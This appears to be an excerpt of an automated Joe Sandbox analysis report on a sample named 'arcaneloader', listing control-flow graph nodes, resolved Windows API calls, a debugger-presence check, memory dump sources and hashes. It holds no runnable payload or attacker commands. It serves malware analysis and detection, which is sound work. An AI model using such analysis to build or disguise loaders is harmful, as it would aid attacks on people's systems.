                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 45ea4c08ba17c8b86c2b9bfe2d439328e9ade548a51c538b161d365bdeb82ba4
                                                                          • Instruction ID: b17390257aa9a9f9233f58665a2b7000e243a4b9b651bd53689fc235054cf867
                                                                          • Opcode Fuzzy Hash: 45ea4c08ba17c8b86c2b9bfe2d439328e9ade548a51c538b161d365bdeb82ba4
                                                                          • Instruction Fuzzy Hash: D231C3B4D0420A8BCB04DFA9C694AAEBBF0FF48304F14C42EE456AB340DB359A05DF65

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 304 dc9e9e-dc9ec8 305 dc9ece-dc9ed0 304->305 306 dc9eca-dc9ecc 304->306 308 dc9ed6-dc9edd call dc9dd3 305->308 309 dc9ed2-dc9ed4 305->309 307 dc9f1f-dc9f22 306->307 311 dc9ee2-dc9ee6 308->311 309->307 312 dc9ee8-dc9ef6 GetProcAddress 311->312 313 dc9f05-dc9f1c 311->313 312->313 315 dc9ef8-dc9f03 call dc6ad0 312->315 314 dc9f1e 313->314 314->307 315->314
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f03d3f7972ef823dde22e4cafe43c5126b764989512309befcbdafc23089fef7
                                                                          • Instruction ID: c92a1ea28acb864a6a26ec994c2e80cbfe01a39bda87381e8bf5a5b443fd9d5b
                                                                          • Opcode Fuzzy Hash: f03d3f7972ef823dde22e4cafe43c5126b764989512309befcbdafc23089fef7
                                                                          • Instruction Fuzzy Hash: CE01D2332052179B9B028F69EC58F16B76AFB8433472D412EF504DB654EB30D80086B4

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CreateElliptic
                                                                          • String ID:
                                                                          • API String ID: 1611293138-0
                                                                          • Opcode ID: 65fd60a50dd4a6ee6135e7aa93553e04a06bcd27ac3bca64fbcf0bdf6dc8f3af
                                                                          • Instruction ID: 498ddf9848a48372ed7e50562f94e68794d6c98f746f28e7d00c0de0c25734c1
                                                                          • Opcode Fuzzy Hash: 65fd60a50dd4a6ee6135e7aa93553e04a06bcd27ac3bca64fbcf0bdf6dc8f3af
                                                                          • Instruction Fuzzy Hash: 7A11C5B4D00309DBCB04EFA4C45579EFBF1FB48304F40891AE855A7354EB74A608CBA5

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 327 dcb807-dcb812 328 dcb814-dcb81e 327->328 329 dcb820-dcb826 327->329 328->329 330 dcb854-dcb85f call dcb757 328->330 331 dcb83f-dcb850 RtlAllocateHeap 329->331 332 dcb828-dcb829 329->332 336 dcb861-dcb863 330->336 333 dcb82b-dcb832 call dc8327 331->333 334 dcb852 331->334 332->331 333->330 340 dcb834-dcb83d call dc7207 333->340 334->336 340->330 340->331
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,00DCA057,00000001,00000364,?,00000005,000000FF,?,00DC6E25,00DD9D20,0000000C), ref: 00DCB848
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 9ca152eed386ec49ce2aaa19e8e76d2e77277510331783c535a0b589998c7ca8
                                                                          • Instruction ID: 6c33db099b6ef27f38f8d655e588d1d561d8a7e9753fb3d344fc6a3db0b85326
                                                                          • Opcode Fuzzy Hash: 9ca152eed386ec49ce2aaa19e8e76d2e77277510331783c535a0b589998c7ca8
                                                                          • Instruction Fuzzy Hash: ACF09A3160162766AB226A628C07F6A7B8CEF41770F18402FF858E7291DB20D809D6F0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 343 dcbc45-dcbc51 344 dcbc83-dcbc8e call dcb757 343->344 345 dcbc53-dcbc55 343->345 353 dcbc90-dcbc92 344->353 347 dcbc6e-dcbc7f RtlAllocateHeap 345->347 348 dcbc57-dcbc58 345->348 349 dcbc5a-dcbc61 call dc8327 347->349 350 dcbc81 347->350 348->347 349->344 355 dcbc63-dcbc6c call dc7207 349->355 350->353 355->344 355->347
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00DC41E0,?,?,00DC1007,?,00DBFAB5), ref: 00DCBC77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 669414c3604d590386b556b12d018c626b550a50fa9102c84a559c7581e1a273
                                                                          • Instruction ID: 2cfec965319907ed44b4d11ee4870dac6e9ed43b5cde2fd7bb6b0683ad98647e
                                                                          • Opcode Fuzzy Hash: 669414c3604d590386b556b12d018c626b550a50fa9102c84a559c7581e1a273
                                                                          • Instruction Fuzzy Hash: 3EE0A931501A236AEA2126719E07F9BAA48AB813B0F08122BBC64D7190CF22C80182B4
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00DC4CB6
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DC4CC4
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DC4CD5
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DC4CE6
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DC4CF7
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00DC4D08
                                                                          • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00DC4D19
                                                                          • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00DC4D2A
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00DC4D3B
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00DC4D4C
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00DC4D5D
                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00DC4D6E
                                                                          • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00DC4D7F
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00DC4D90
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00DC4DA1
                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00DC4DB2
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00DC4DC3
                                                                          • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00DC4DD4
                                                                          • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00DC4DE5
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00DC4DF6
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00DC4E07
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00DC4E18
                                                                          • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00DC4E29
                                                                          • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00DC4E3A
                                                                          • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00DC4E4B
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00DC4E5C
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DC4E6D
                                                                          • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00DC4E7E
                                                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DC4E8F
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DC4EA0
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00DC4EB1
                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DC4EC2
                                                                          • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00DC4ED3
                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DC4EE4
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00DC4EF5
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00DC4F06
                                                                          • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00DC4F17
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00DC4F28
                                                                          • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00DC4F39
                                                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00DC4F4A
                                                                          • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00DC4F5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                          • API String ID: 667068680-295688737
                                                                          • Opcode ID: c5cfaced3e2ed633bae798d2f1541db5baaa1ad8deea11685f1735d40cfad2e3
                                                                          • Instruction ID: fbf0d75d63f34393194a6a8f384e604e72836146ab152a8fb34acb397a761255
                                                                          • Opcode Fuzzy Hash: c5cfaced3e2ed633bae798d2f1541db5baaa1ad8deea11685f1735d40cfad2e3
                                                                          • Instruction Fuzzy Hash: C76145719A3351AFC7806FF4AD1DCC67BA8AB097127405517B101D3362DBB6A085DFB8
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00DBCF90
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00DBD216
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                          • String ID:
                                                                          • API String ID: 350343453-0
                                                                          • Opcode ID: 3ab0e5bfd5b53e65e6af24cd937d660e830f922685aeda604ed544efe8dde026
                                                                          • Instruction ID: e28c0a829bf7fbb2d6ae2c0c73f3351caf0db7eaf9e035b4d7b684fc2788a374
                                                                          • Opcode Fuzzy Hash: 3ab0e5bfd5b53e65e6af24cd937d660e830f922685aeda604ed544efe8dde026
                                                                          • Instruction Fuzzy Hash: 02F11B76E505108FEF004A7CC8A83DF2BE69B66330F2A172ADAB55B7D2D62744098F50
                                                                          APIs
                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DCC8CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: 8e68cd7428a692e49eb1d82fe21d4ca3bc5e5d6f0c05d74c8c651e0e7e896993
                                                                          • Instruction ID: 5ddf2208ecfc2a4fc0931824b656a7ddc5fcfba4bd5162f343638d3f38c0bac7
                                                                          • Opcode Fuzzy Hash: 8e68cd7428a692e49eb1d82fe21d4ca3bc5e5d6f0c05d74c8c651e0e7e896993
                                                                          • Instruction Fuzzy Hash: 9871CE7191111A9EDF20EF688C89FAAB7B9EF05300F1851DEE10DA3251DB308E859F30
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DC5450
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00DC551C
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DC553C
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00DC5546
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 254469556-0
                                                                          • Opcode ID: 2d70442914290952fd8d8bf411507a7db695518094ef29e55f61d72af4fc7ae1
                                                                          • Instruction ID: abd9c17fe3df3afeb6e1b5575741886617d8e56be2d5e318dc87060fd01a6336
                                                                          • Opcode Fuzzy Hash: 2d70442914290952fd8d8bf411507a7db695518094ef29e55f61d72af4fc7ae1
                                                                          • Instruction Fuzzy Hash: CB311875D053199BDF10EFA4D989BCDBBB8BF08304F1040AAE40DAB251EB719A85CF25
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00DC7EC2
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00DC7ECC
                                                                          • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00DC7ED9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          • Opcode ID: ae2327bf148a519daa1598fc72ce1fff39bb625d7163f5a0e9fe373fb4f50c79
                                                                          • Instruction ID: 13769eeb021f1de17b326738b997ce4b4562a7a6aea46a2b5b4981bdda04f87a
                                                                          • Opcode Fuzzy Hash: ae2327bf148a519daa1598fc72ce1fff39bb625d7163f5a0e9fe373fb4f50c79
                                                                          • Instruction Fuzzy Hash: 8831B2759012299BCB21DF64DC89B8DBBB8BF08310F5041EAE41CA7291EB709F858F64
                                                                          APIs
                                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00DC2437
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ___std_exception_destroy
                                                                          • String ID:
                                                                          • API String ID: 4194217158-0
                                                                          • Opcode ID: 9163aba120657c35f981e8f70afced4ec323e9d66be1f9dce6a0e32f3134a106
                                                                          • Instruction ID: 711b12a209c300a064661f98469a22c25ae94d80b08c0aec692c9edee68e1a6d
                                                                          • Opcode Fuzzy Hash: 9163aba120657c35f981e8f70afced4ec323e9d66be1f9dce6a0e32f3134a106
                                                                          • Instruction Fuzzy Hash: A9A26B66A555844FEF024AB884B93DF6FE24B6B730F6A2755C6F06F2D3D50B000B9B60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -g}5
                                                                          • API String ID: 0-4071012034
                                                                          • Opcode ID: f211be79c9c01da6a2e306335b56a0ab7bdb83b5bd87881d90909c79b44d0fed
                                                                          • Instruction ID: b1a507e2770ff4915a35a9aa68ff7d75dcf0336dce34cd2e5de46208d37dfba6
                                                                          • Opcode Fuzzy Hash: f211be79c9c01da6a2e306335b56a0ab7bdb83b5bd87881d90909c79b44d0fed
                                                                          • Instruction Fuzzy Hash: 4B92AAA6A556C45FEF024AB8D4A93DF6FF24B6B331F6E2B5586E01F2D3C507004A9B10
                                                                          APIs
                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DD1F2D,?,?,00000008,?,?,00DD1AFF,00000000), ref: 00DD21FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
